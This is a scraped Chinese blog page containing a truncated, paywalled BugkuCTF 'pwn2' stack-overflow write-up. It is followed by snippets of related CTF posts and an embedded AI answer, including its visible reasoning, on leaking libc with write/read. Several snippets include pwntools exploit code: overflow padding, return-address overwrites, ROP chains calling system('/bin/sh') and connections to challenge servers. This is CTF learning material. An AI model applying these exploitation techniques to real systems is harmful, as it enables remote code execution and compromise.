BugkuCTF-PWN题pwn2-overflow超详细讲解

最新推荐文章于 2024-11-25 12:54:41 发布
原创 最新推荐文章于 2024-11-25 12:54:41 发布 · 2.8k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文详细解析了Bugku CTF中PWN题pwn2的解题过程,重点介绍了x64函数调用规则和C语言相关知识点,包括栈溢出利用、get_shell_函数地址计算以及相关函数如memset、setvbuf、puts和read的使用。在解题流程中,通过ida分析、gdb调试,最终成功获取flag。

解题思路

1)计算出get_shell_的地址偏移量
2)算出来之后就直接溢出到后门函数

知识点

x64函数调用规则

解题之前我们先学下linux x64的函数调用规则。
x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h、g。
保存完参数之后再把函数后面一条指令的地址入栈保存。
栈结构
在这里插入图片描述
上图就是一个函数的栈结构,上面是栈顶,下面是栈底,栈顶是低地址,栈底是高地址,read函数往栈里写数据是从栈顶往栈底写入

栈顶指针(寄存器):rsp
栈底指针(帧指针):rbp

C语言知识点

memset
memset:可以方便的清空某个结构类型的变量或数组,作用是在一段内存块里填充某个给定的值,它是对较大的结构体或数组进行清零操作的一类最快方法,为string.h头文件里的函数,按字节对内存块进行初始操作
例:memset(buffer, 0, sizeof(buffer)) 给buffer清出一个sizeof(buffer)大小的空间,填充0,做数组初始操作工作。

setvbuf
为什么要使用setvbuf函数
如果你的内存足够大,可以把文件IO的BUF设置大一些,这样每次你用
fopen/fread/fwrite/fscanf/fprintf语句的时候

最低0.47元/天 解锁文章
BugkuCTFoverflow2[WriteUP]
如有错误感谢斧正
04-14 1130
我们需要构造payload使buf数组溢出,然后接上这里的total总的合成地址即可实现shell交互。总共需要填充28个字节,后面溢出可以填充为成0x20+0x8,或者直接写成0x28。总链:total = 0x40126b + 0x402004 + 0x401050。存在/bin/sh意味着我们可以利用这个字符串启动shell,双击查看地址。先看到_system函数,此函数可以直接返回一个由实参当作命令的消息。再查看下方的地址信息,获取到该函数十六进制地址为:0x401050。查看一下flag文件。
bugkuoverflow2
2201_75556700的博客
11-27 1791
我们通过构造rop链来执行system("/bin/sh")这个命令,在使用system函数时,它的第一个参数,需要放在rdi寄存器中,而这个参数就是/bin/sh。4、用ida64分析文件,先查看主函数,这段主函数的关键就是,它定义了一个数组大小是4,而read函数在读取的时候,是读取它的0x100ull这超出了数组的范围,会导致栈溢出。6、通过shift+f12来查看调用了哪些函数,这里看到了一个脚本函数,双击/bin/in查看程序地址,查看system函数调用的地址。
BugkuCTF-PWNpwn5-overflow2超详细讲解
am_03的博客
08-31 2134
知识点 setvbuf: setvbuf函数的功能: 如果你的内存足够大,可以把文件IO的BUF设置大一些,这样每次你用 fopen/fread/fwrite/fscanf/fprintf语句的时候,都会在内存里操作,减少内存到磁盘IO读写的操作次数,提高系统效率。 如果你的程序的功能涉及到类似数据库、视频、音频、图像处理等大量需要爆发式磁盘到内存的IO情况下,可以考虑setvbuf进行优化内存IO。 功 能: 把缓区与流相关 解流程 查看保护机制 发现开启了RELRO,NX 只能通过ROP绕过 IDA
BugkuCTF pwn overflow
ChaoYue_miku的博客
07-02 3184
** 0、在Linux中打开文件,使用file命令查看文件类型,使用checksec检查保护情况 ** 64位文件,未开启任何保护,尝试运行一下 ** 1、使用IDA 64 Pro打开文件 ** 查看主函数 存在栈溢出漏洞 ** 2、寻找后门函数 ** 存在一个get_shell函数,地址为0x400751 ** 3、构造exp ** from pwn import * #io = process('./pwn2') io = remote("114.67.246.176", 15587)
bugkuoverflow
2201_75556700的博客
11-25 889
4、用64位的IDA分析文件,按F5进入主函数,这段程序定义了一个48字节的数组s。memset()函数将数组s的前0x30字节初始化为0,read()函数以s作为缓存区读取了0x100个字节的数据。数组s的长度小于要读取的长度,这会导致缓冲区溢出。5、在函数那一栏,看到名为get_shell的函数,可能是一个后门函数,它的地址为0x400751。我们需要覆盖返回地址,因此需要填充 48 字节的缓冲区,再加上 8 字节的栈帧指针(EBP)。需要找到能调用该函数的入口,需要将数组s的部分进行覆盖。
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 445
[Bugku CTF——Pwn] pwn2 目地址:https://ctf.bugku.com/ 额,好久不写这么简单的目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
BugkuCTF-PWNcanary超详细讲解
am_03的博客
08-31 2965
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解流程 目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4643
知识点 解流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该目为典型的格式字符串漏洞。 解思路 此的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
ctf库ctf-pwn收集
03-31
ctf库 CTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
BugkuCTF pwn overflow2
ChaoYue_miku的博客
07-04 1773
** 0、尝试打开文件,使用checksec检查保护情况 ** ** 1、使用IDA 64 Pro打开文件 ** read()函数存在栈溢出,查看栈结构 ** 2、构造rop链 ** Shitf+F12查找字符串 发现/bin/sh的地址是0x402004 system函数的地址是0x401050 64位程序的第一个参数在 rdi 寄存器里 使用ROPgadget工具寻找汇编指令 rdi寄存器地址:0x40126b ** 3、构造exp ** from pwn import * r = remo
ctf.bugku ctf目详解——pwn2
yeshen4328的专栏
05-26 1418
ctf.bugku ctf目详解——pwn2 目 程序分配了一个栈上的变量s,长度为0x30,并一开始置0. 9行开始从外部读取0x100的数据到s中,由此可见此处存在一个栈溢出。 同时使用ida打开程序之后发现还存在一个get_shell的函数: 于是我们需要想方法利用溢出来调用这个get_shell函数。 x64函数调用规则 解之前我们先学习下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e
bugku-pwn-瑞士军刀 overflow2
m0_57954651的博客
01-13 2271
在klai中使用file命令查看文件类型 可以看到是64位。system函数的地址是0×40043F。使用IDA 64 Pro打开文件 查看主函数。利用Kali连接 ls查看。给了个nc和文件 下载。
BugKu - pwn2
Casuall的博客
07-06 3873
这道来自于bugku旧平台的第二道pwn,还是比较简单的,一个典型的缓冲区溢出。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
bugku pwn2
doudoudedi
06-04 1751
这道是一道简单的栈溢出 直接用IDA查看 很明显的得到flag的函数 直接上exp from pwn import * p=remote('114.116.54.89',10003) p.recvuntil('something?') payload='a'*56+p64(0x400751) p.sendline(payload) p.interactive() ...
[pwn]bugku pwn2
qq_18823653的博客
03-26 5744
首先检查了一下保护机制,发现几乎啥保护都没有,ida查看一下 read()函数存在溢出,然后又看了一下发现main函数下面有一个get_shell_函数,点进去看了看应该是让返回地址覆盖成getshell地址, gdb看一下偏移rbp前四位为bAA1,算一下偏移 到rbp偏移为48,向上8字节是父函数rbp,所以偏移56覆盖到返回地址,get_shell_地址为 exp如下: from pwn ...
bugku_pwn2 | by AriSan
AriSan_XD的博客
05-02 334
bugku_pwn2栈溢出入门 | AriSan 看源码,非常明显的栈溢出 直接有后门函数 checksec后没有任何保护 使用 gdb调试,在 read 函数处下断点,运行,因为是64位的程序,得到栈空间为 RBP-RSI+8=0x70-0x40+8=56 使用垃圾数据填满栈空间后,覆盖返回地址为后门函数地址,直接执行后门函数 成功 exp: from pwn import * p ...
bugku-pwn2-wp
weixin_45427676的博客
04-05 430
下载完后先在VM中checksec查看保护机制 基本没有开什么保护,可以知道文件是64位的,用64位IDA打开,按F5键反汇编一下,看一下main函数 可以发现read()函数存在栈溢出漏洞,缓冲区s的大小为0x30,而read()函数指向缓冲区中读入0x100大小的数据,所以造成栈溢出。 在main函数下面有一个get_shell_()函数,打开看一下 有一个system(“cat fl...
南京邮电大学CTF-PWN-Stack Overflow
WocW的博客
12-21 1559
经过双月赛,通过阅读同级人的WriteUp结合参赛的亲身体验。深深感觉到自己文字表达能力的欠缺,以及技术上的差距。但能意识到差距是好事,意识到了就努力去弥补。一直想要学习PWN,一拖再拖,终于开始了。 关于write up,老师说了一句话,印象深刻。“write up 是写给别人看的,不是你自己看懂了就行。” 进入正: 把文件拖入IDA,进入main函数F5反编译,先看程序流程。 set...
NJUPT-CGCTF pwn2 StackOverflow [Writeup]
cossack9989的博客
12-30 2219
最近肥肠地想入门一下pwn,找了道试了一下。 目网址:StackOverflow 栈溢出啊。。虽然我水平很菜。。还是觉得挺有意思的 不扯了,先看。 扔到32位IDA里面看看,观察一下,发现有两个很关键的函数message与pwnme,很显然message可以用来栈溢出,pwnme可以用来调用system函数,但是Alt+T之后并没有发现‘/bin/sh’,也没有提供libc.so,这
ctf-pwn怎么用write+read求libc的基址
最新发布
11-15
<think> 我们参考引用内容,特别是引用[1]到[5],来回答用户关于使用write和read函数在CTF Pwn中求libc基址的方法。 根据引用[4]和[5],我们知道: 1. 程序运行后,libc中的函数在内存中的实际地址 = libc基址 + 函数在libc中的偏移量。 2. 我们可以通过泄露一个已经执行过的函数的实际地址(例如write或puts)来计算libc基址。 在CTF Pwn中,如果程序有栈溢出漏洞,我们可以构造ROP链来调用write函数(或puts函数)来泄露某个函数的真实地址(通常是GOT表中存储的地址),然后通过这个地址减去该函数在libc中的偏移量,得到libc基址。 具体到使用write+read的方法,通常步骤如下: 步骤1:第一次溢出,利用ROP调用write函数,将GOT表中某个函数(如write自身或puts)的地址输出到标准输出(文件描述符1)。同时,为了后续继续利用,我们需要控制程序返回到一个可以再次触发溢出的位置(如main函数开头)。 步骤2:接收程序输出,解析出泄露的函数地址。 步骤3:根据泄露的函数地址,计算libc基址(基址 = 泄露的函数地址 - 该函数在libc中的偏移量)。注意,不同libc版本中函数的偏移量不同,因此需要确定libc版本(可以通过泄露多个函数地址来匹配,或者目提供了libc文件)。 步骤4:根据libc基址,计算出system函数和字符串"/bin/sh"的地址。 步骤5:第二次溢出,利用ROP调用read函数(或其他输入函数)将构造好的ROP链(调用system("/bin/sh"))写入到某个可写内存区域(如.bss段),然后跳转到该区域执行;或者直接构造ROP链调用system("/bin/sh")。 但是,用户特别提到使用write+read,所以这里重点在于利用write泄露地址和利用read再次读入数据。 以下是一个典型利用场景的伪代码: 第一次ROP链: - 覆盖返回地址为write函数的PLT地址(write@plt) - 设置write函数的参数:文件描述符(1)、要泄露的地址(如write_got,即GOT表中write的地址)、输出的长度(4或8字节,取决于32位还是64位) - 设置返回地址为main函数的地址(或另一个可以再次触发溢出的地址),这样在write执行完后程序会重新运行到有漏洞的地方。 接收程序输出的write_got的值,然后计算libc基址。 第二次ROP链: - 覆盖返回地址为read函数的PLT地址(read@plt) - 设置read函数的参数:文件描述符(0,即标准输入)、存储地址(如.bss段的一个缓冲区)、长度(足够长以容纳我们输入的ROP链) - 设置返回地址为存储的ROP链的起始地址(即.bss段的那个缓冲区),这样read函数读入的数据(即我们构造的ROP链)会从.bss段开始执行。 第二次ROP链中,我们可以在.bss段写入一个ROP链,这个ROP链调用system("/bin/sh")。或者,我们可以利用read函数读入一个ROP链直接调用system("/bin/sh"),但要注意此时需要知道system函数的地址。 另一种常见的做法是:第二次ROP链直接构造调用system("/bin/sh"),而不通过read再次读入。但这里用户要求使用read,所以我们需要用read来读入后续的ROP链或字符串。 具体构造示例(32位): 第一次ROP链: - 填充缓冲区 - write@plt - main_addr (返回地址) - 1 (文件描述符) - write_got (要泄露的地址) - 4 (输出长度) 接收4个字节的write_got地址,计算libc基址:libc_base = write_addr - libc_write_offset 然后计算system地址和/bin/sh地址: system_addr = libc_base + libc_system_offset binsh_addr = libc_base + libc_binsh_offset 第二次ROP链: - 填充缓冲区 - read@plt - system_addr (注意:这里我们希望read后返回到system,并且参数是/bin/sh,但需要调整栈) - 0 (文件描述符) - binsh_addr (读入地址?这里需要调整思路) 实际上,我们通常需要将"/bin/sh"字符串写入内存,如果libc中已经有这个字符串,我们可以直接使用。然后调用system函数。 但是,如果我们使用read读入,我们可以这样: 第二次ROP链1(使用read读入字符串和后续ROP): read(0, bss_addr, len(payload)) # 读入payload到bss_addr 然后返回到bss_addr(即执行我们读入的shellcode或ROP链) 但是,我们也可以直接构造ROP链调用system,此时需要将"/bin/sh"的地址作为参数。我们可以将"/bin/sh"字符串读入到已知地址(如.bss段),然后调用system。 因此,第二次ROP链可以这样: - 覆盖返回地址为read@plt - 设置返回地址为pop指令的地址(用于清理read的参数),然后接着是system的地址和参数 - 参数1:0(标准输入) - 参数2:bss_addr(.bss段的一个地址,用于存放我们输入的字符串"/bin/sh") - 参数3:8(长度,足够存放字符串) - 然后设置返回地址为一段gadget:pop ebx; ret; 这样当read执行完后,会弹出参数(清理栈),然后执行下一条指令。接着我们调用system,参数是bss_addr。 具体构造(32位): payload2 = padding + read_plt + pop3_ret + 0 + bss_addr + 8 + system_addr + ret_addr + bss_addr 解释: - 调用read(0, bss_addr, 8)读入8个字节到bss_addr(这里我们输入"/bin/sh\x00") - read函数返回后,执行pop3_ret(一个弹出3个参数的gadget),将read的参数弹出栈,然后返回到system_addr - system_addr的返回地址是ret_addr(可以是一个无用的ret指令地址),参数是bss_addr(即我们读入的字符串地址) 但是,在64位系统中,参数传递通过寄存器,所以构造方式不同。 由于用户没有指定是32位还是64位,这里我们以32位为例。 然而,在实际目中,我们往往需要根据目提供的libc来确定偏移量,或者使用LibcSearcher等工具来查找。 总结步骤: 1. 利用write泄露一个GOT表地址(如write_got)。 2. 计算libc基址(需要知道该函数在libc中的偏移)。 3. 计算system和/bin/sh的地址(需要知道它们在libc中的偏移)。 4. 利用read函数读入字符串"/bin/sh"到.bss段(可选,如果libc中已有则不用读入)。 5. 构造ROP链调用system("/bin/sh")。 注意:如果目中write函数不可用,也可以用puts函数,但puts遇到'\0'会结束,所以需要小心。 引用[5]中提到了使用LibcSearcher来查找libc版本和偏移,我们可以使用类似的工具。 下面是一个简化的例子(假设是32位程序): 第一次ROP链: payload1 = 'A'*offset + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) 然后,接收泄露的write_got地址(4字节),解析为地址。 然后,计算libc_base = write_addr - libc.symbols['write'] # 这里需要知道libc版本,或者使用LibcSearcher 接着,计算system_addr = libc_base + libc.symbols['system'] binsh_addr = libc_base + next(libc.search('/bin/sh')) # 或者如果libc中没有,则需要读入 第二次ROP链: # 首先,我们需要读入"/bin/sh"字符串到.bss段(假设bss_addr已知) payload2 = 'A'*offset payload2 += p32(read_plt) # 调用read payload2 += p32(pop3_ret) # read返回后跳到这里,弹出3个参数 payload2 += p32(0) # fd=0 payload2 += p32(bss_addr) # buf payload2 += p32(8) # len # 然后,我们调用system,参数是bss_addr payload2 += p32(system_addr) payload2 += p32(0) # system的返回地址,可以随意 payload2 += p32(bss_addr) 然后发送payload2,接着发送字符串"/bin/sh\x00"(8字节)。 这样,程序就会执行system("/bin/sh")。 但是,如果libc中已经有"/bin/sh"字符串,我们可以直接使用,不需要读入。那么第二次ROP链可以简化为: payload2 = 'A'*offset + p32(system_addr) + p32(0) + p32(binsh_addr) 然而,用户要求使用read,所以这里我们展示的是需要读入字符串的情况。 注意:实际目中,我们可能还需要考虑栈平衡等问。 以上是使用write+read求libc基址并最终获取shell的方法。 现在,我们根据用户要求生成相关问。 §§相关问§§ 1. 在32位和64位系统中,利用write和read函数求libc基址的主要区别是什么? 2. 如果程序中没有write函数,还可以用哪些函数来泄露libc基址? 3. 在利用read函数读入数据时,如何确定.bss段的地址? 4. 如何解决不同libc版本中函数偏移量不同的问? 5. 在构造ROP链时,为什么有时候需要返回到main函数重新开始? </think>### CTF Pwn中使用write+read求libc基址的方法 在CTF Pwn中,通过`write`和`read`函数泄露libc基址是常见的利用技术,主要流程如下: #### 核心原理 1. **libc地址计算** libc基址 = 泄露的函数实际地址 - 该函数在libc中的固定偏移量 即:$libc\_base = leaked\_addr - offset$ 2. **GOT/PLT机制** GOT表存储函数真实地址,通过泄露GOT表项获取libc函数地址(如`write@got`)[^2][^5]。 #### 操作步骤 1. **第一次ROP链(泄露地址)** ```python payload1 = b'A' * offset # 填充缓冲区 payload1 += p64(pop_rdi) # 设置rdi=1 (stdout) payload1 += p64(1) payload1 += p64(pop_rsi) # 设置rsi=write_got payload1 += p64(elf.got['write']) payload1 += p64(pop_rdx) # 设置rdx=8 (64位地址长度) payload1 += p64(8) payload1 += p64(elf.plt['write']) # 调用write(1, write_got, 8) payload1 += p64(main_addr) # 返回main重新触发溢出 ``` - 执行后接收输出的8字节数据,解析为`write`函数的实际内存地址[^5]。 2. **计算libc基址** ```python write_addr = u64(io.recv(8)) # 解析泄露的地址 libc_base = write_addr - libc.sym['write'] # 计算基址 system_addr = libc_base + libc.sym['system'] binsh_addr = libc_base + next(libc.search(b'/bin/sh')) ``` 3. **第二次ROP链(getshell)** ```python payload2 = b'A' * offset payload2 += p64(pop_rdi) payload2 += p64(binsh_addr) # rdi="/bin/sh" payload2 += p64(ret) # 栈对齐(可选) payload2 += p64(system_addr) # 调用system("/bin/sh") ``` #### 关键点说明 1. **`read`函数的作用** - 在限制输入长度的目中(如[^3]),用`read`构造栈迁移: ```python payload += p64(pop_rdi) + p64(0) # fd=0 (stdin) payload += p64(pop_rsi) + p64(new_stack) # 目标栈地址 payload += p64(elf.plt['read']) # read(0, new_stack, size) payload += p64(migrate_gadget) # 跳转到新栈 ``` - 将后续ROP链读到可控内存区域(如.bss段)[^3]。 2. **动态偏移处理** - 当libc版本未知时,用`LibcSearcher`匹配: ```python from LibcSearcher import * libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') ``` #### 典型应用场景 1. 存在栈溢出但无`system`/`/bin/sh`的程序 2. 开启NX保护时(无法执行shellcode) 3. 输入长度受限需结合栈迁移(如[^3]) ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值